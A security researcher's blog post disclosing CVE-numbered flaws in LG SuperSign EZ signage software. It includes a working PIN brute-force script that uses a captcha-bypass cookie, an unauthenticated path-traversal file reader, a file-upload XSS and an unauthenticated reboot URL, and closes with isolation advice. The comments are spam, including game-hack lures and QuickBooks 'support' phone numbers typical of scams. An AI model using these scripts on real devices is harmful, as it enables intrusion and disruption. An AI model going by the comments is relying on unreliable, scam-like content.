jueves, 13 de septiembre de 2018

Multiple vulnerabilities in LG SuperSignEZ CMS


Hello there, it´s been a long time.

Lately, I´ve been playing with LG SuperSign TVs and found some vulnerabilites.

These vulnerabilities have been addressed with the following CVE's

Weak authentication (bypass captcha + 4 digit PIN) CVE-2018-16286
Arbitrary FIle Upload CVE-2018-16287
LFI CVE-2018-16288
DoS via reboot command CVE-2018-16706


As we can see in the link above, LG SuperSign TVs are..

"*An industry definitive, software-based content management solution 
  *All-in-one solution for editing, scheduling, and distribution
  *Suitable for large-scale displays operation. Seamless management of different content for different displays"

These TVs are used in companies and stores for advertising.

The displayed content can be managed  from a CMS that these TVs have built-in, called SuperSign EZ. It offers a web interface running on port 9080 (Using a Node.js Express Framework):




First vuln, weak authentication

In the screenshot above, we have a login form with two fields, PIN and captcha. Hmmm...We don't know the min and max length of the PIN number and we can't bruteforce it because the presence of the captcha. But....Once I had access to the administration page (In this case the CMS had the default PIN 0000) I found two interesting things.

1_ There is a cookie that takes the name and value captcha:pass



2_ The PIN number, has a max of 4 digits (I verified that in the "Change PIN number" section)



So, I logged out, and using a cookie editor, added a cookie with the name "captcha" and the value "pass" and guess what...



The captcha was gone!

So....We have a 4 digit PIN number and no captcha to resolve...It's time to script our way in!

Analizing the response after a successful login we receive the message:


If we enter a wrong password we get:



So, we can code something like this:

import requests
import re
from argparse import ArgumentParser


parser = ArgumentParser(description="SuperSign BruteForce Script")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-p", "--pass", dest="password",
                        help="password")

args = parser.parse_args()


print "===================================="
print "=    SuperSign BruteForce Script                                          ="
print "===================================="



f = open(args.password, 'r')  #Opening password file (or you can just use while starting from 0000 to 9999)
for line in f:

data = {
        'id':'admin',
        'password':str(line).replace('\n', ''),
        'captcha':'pass',
        'captcha_compare':'pas'
}

print '[+]Trying with PIN:',str(line)

s = requests.post('http://'+ str(args.target).replace('\n', '') +'/', data=data)
matches = re.findall('success', s.text);

if len(matches) == 0:
    print 'Access Denied'
print
else:
    print 'Success!'
    break


The code is very simple. We make a request, using the cookie captcha:pass, for every value in 0000-9999 range and wait for the right response.

Bingo, we are in.

Second vuln, Local File Inclusion

Once I was in, using again my friend burp, I analized the requests that the application make when the user wants to add a new template and found that some files are called in this URL:

http://LG_SuperSign_IP:9080/signEzUI/playlist/edit/upload/LGXXXXXX/uploaded_file.ext

uploaded_file.ext is the file included in the template.

So, I started to try for LFI in some paths, and after receive the message "Not found" over and over, I received this beautiful response in this path:

http://LG_SuperSign_IP:9080/signEzUI/playlist/edit/upload/../../../../../../../../../../etc/passwd



This is so critical, because, this TV's can be connected with any other device of the company/store:


An attacker can obtain sensitive information for further attacks.

If you are thinking, An attacker needs to know the first vulnerability to gain access and later use the second one to get those files. Well, you are wrong. There is no need to be authenticated to exploit this LFI. If you take a look at the picture again, you can see that there is no cookie, so I'm not logged in.

Here is the code in python to retrieve any file you want:

import requests
import re
from argparse import ArgumentParser


parser = ArgumentParser(description="SuperSign Reboot")
parser.add_argument("-t", "--target", dest="target",
                        help="Target")
parser.add_argument("-p", "--path", dest="filepath",
                        help="path to the file you want to read")

args = parser.parse_args()
path = args.filepath


s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path))
print s.text


Third vuln, Arbitrary file upload

Obviously, if you can serve content, you've got a File Upload function. The problem is that there is no control about the file type a user can upload, so we can upload any kind of files.


Then, we can access the uploaded file using the LFI vulnerability (to get an XSS in this case):


With this in mind, an attacker can access to the manager, upload a malicious file and send the link to the victim.


Hey wait, there's one more..

Fourth vuln, DoS via reboot function

Triggering an error, I found some interesting files that I could read via the LFI. One of those file had the code to a reboot function:



So...making a request to the URL http://SuperSign_IP:9080/qsr_server/device/reboot it is possible to reboot the device without authentication.


Well, I guess that's all for the moment.


Recommendations

At the moment, the only thing you can do to mitigate this vulnerabilities is isolate this devices. You must restrict the access to this TVs in your internal network and please, please, please, DO NOT EXPOSE THEM TO THE INTERNET!!!!


27 comentarios:

  1. Great post man thanks for sharing this useful information but I was i serach for Jailbreak download finally i found one original and working PS3 Jailbreak & PS4 Jailbreak Games PKG for free follow the link to read more.



    f you are looking for an PS4 Jailbreak then your search is over now as we are giving you a chance to jailbreak your PS4,Visit PS4 Jailbreak download

    ResponderEliminar
  2. Fast track high speed process to transfer money from blockchain wallet to euro account, yes we support all countries like india america, europ africa and all over the world, simple visit withdraw bitcoin from blockchain

    ResponderEliminar
  3. Fast track high speed process to transfer money from blockchain wallet to euro account, yes we support all countries like india america, europ africa and all over the world, simple visit withdraw bitcoin from blockchain

    ResponderEliminar
  4. ReactPSN would be the tool to use. Unknown CFW is an error that sometimes randomly happens, it should work regardless if you get it or not. It shouldn't factory reset your machine, are you sure it didn't just log in to the aa account ps3 jailbreak 4.83 free

    ResponderEliminar
  5. It's a thing that the PS4 does that you have to opt out of where it will display games on the home screen that Sony thinks you might like to buy. Its a global thing but clearly you have opted out of it and forgotten about it. ps4 jailbreak 6.20 tutorial

    ResponderEliminar
  6. Had a low rank, as i only played a few games this week. Think i got 2 Jumbo Premium Gold packs and 7k coins? fifa 19 hack

    ResponderEliminar
  7. FIFA 19 Hack are 100% entirely free for mobile, ps4 and PC in addition to safe and also protected. fifa mobile 19 hack

    ResponderEliminar
  8. Got an opportunity to read the fantastic and imaginary blogs. It gives me lots of great pleasure and interest. Thanks once again for sharing the resourceful blog.
    download gta 4 pc game highly compressed

    ResponderEliminar

  9. We are a Quickbooks Support company. We always Provides Solution for any error. The quickbooks support phone number can be easily solved if you call us on +18009016679.

    ResponderEliminar
  10. Instant help for your Quickbooks Accounting software you can dial Quickbooks Desktop Support Phone Number 800-901-6679 for USA. We are always available for your help.

    ResponderEliminar
  11. Nice Blog It’s a really informative for all. QuickBooks is one of the best accounting software which helps in managing your company finances and accounting. We are providing technical support in Quickbooks Desktop Support Phone Number. Please call us our Toll-free Number + 1-800-986-4607.

    ResponderEliminar
  12. Quickbooks accounting software is mostly used by small business owner. If you are using this software and sometimes face errors. Avail instant & effective solution for your queries & issues while using Quickbooks accounting, simply dial Dial Quickbooks Pro Support Phone Number 1-800-901-6679.

    ResponderEliminar
  13. Nice Blog It’s a really informative for all. Quickbooks accounting software helps you to solve accounting problems. We are providing technical support in Quickbooks Support Phone Number 1800 . We also provide guidance & all types of information about Quickbooks. So if you need any issue Please call us our Toll-free Number + 1-800-986-4607.

    ResponderEliminar
  14. Nice Blog Thanks for sharing this usefull link. Quickbooks accounting software is helpful for maintain client payroll taxes accounting problems for instant help about Quickbooks Desktop Payroll Support Number . Our technical team always available for your help our Toll-free Number + 1-800-986-4607.

    ResponderEliminar
  15. Nice Blog Our support team at QuickBooks Tech Support Phone Number 1-800-986-4591 resolve your all issue in Quickbooks like installation & upgrading. We are providing 24*7 technical support so if you need any query.

    ResponderEliminar
  16. Nice Blog Our support team at QuickBooks Support Phone Number 1-800-986-4591 resolve your all issue in Quickbooks like installation & upgrading. We are providing 24*7 technical support so if you need any query.

    ResponderEliminar
  17. Nice Blog If you need Quickbooks Tech Support Phone Number then you can dial +1-800-986-4591 for help and support. Our technical support team always provides you the best technical help.

    ResponderEliminar
  18. What is Quickbooks Support Phone Number 800-901-6679 for instant help. In quickbooks accounting software if you face any type of issue in this. Our Highly skilled Technicians are there for you, to resolve your queries.

    ResponderEliminar
  19. Our Quickbooks Support Phone Number USA 800-901-6679 for instant help. In quickbooks accounting software if you face any type of issue in this. Our Highly skilled Technicians are there for you, to resolve your queries.

    ResponderEliminar
  20. Thanks For Sharing!
    Quickbooks application can easy to use. It is user friendly software if yur are facing issue dial our Quickbooks Support in New York 1-800-986-4591.

    ResponderEliminar
  21. Avail instant & effective solutions from our Quickbooks Support Phone Number. Our support team constitutes of highly skilled & trained technicians who have years of experience in handling technical defects. It doesn’t matter how complex the issues would be. Get it resolved, from our Support team. As they are available for you, 24*7. Whenever you face any trouble, feel free to contact Quickbooks support Phone Number 800-901-6679.

    ResponderEliminar
  22. Any technical issue obstructing your way ahead in Quickbooks ? Call us now, on Quickbooks Support Phone Number . Avail instant solutions for the Quickbooks technical issues persist in the software. In case, you need any assistance regarding the software, contact us 1-800-986-4607. Our team constitutes of certified proadvisors who have years of experience in handling technical issues.

    ResponderEliminar
  23. Quickbooks is mostly used by smart business owner. If you are using this software and sometimes face errors. Avail instant & effective solution for your queries & issues while using Quickbooks Payroll accounting, simply dial Dial Quickbooks Helpline Number 800-901-6679.

    ResponderEliminar